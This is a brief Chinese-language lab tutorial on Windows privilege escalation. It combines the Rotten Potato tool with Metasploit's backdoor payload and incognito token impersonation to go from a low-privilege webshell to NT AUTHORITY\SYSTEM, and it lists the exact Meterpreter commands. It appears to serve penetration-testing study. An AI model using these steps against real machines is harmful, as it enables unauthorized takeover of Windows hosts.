烂土豆配合令牌窃取提权是用来解决普通令牌窃取提权因为webshell权限太低无法提权成功
环境:内网kali和win10
1.先用msf生成一个windows的后门监听上线
2.在网上下载烂土豆
3.利用msf上传烂土豆
4.使用msf自带的令牌窃取功能
先查看一下未提权的权限
execute -cH -f ./potato.exe
运行烂土豆
use incognito
使用令牌窃取模块
list_tokens -u
查看可以窃取的列表
impersonate_token "NT AUTHORITY\SYSTEM"
窃取system的权限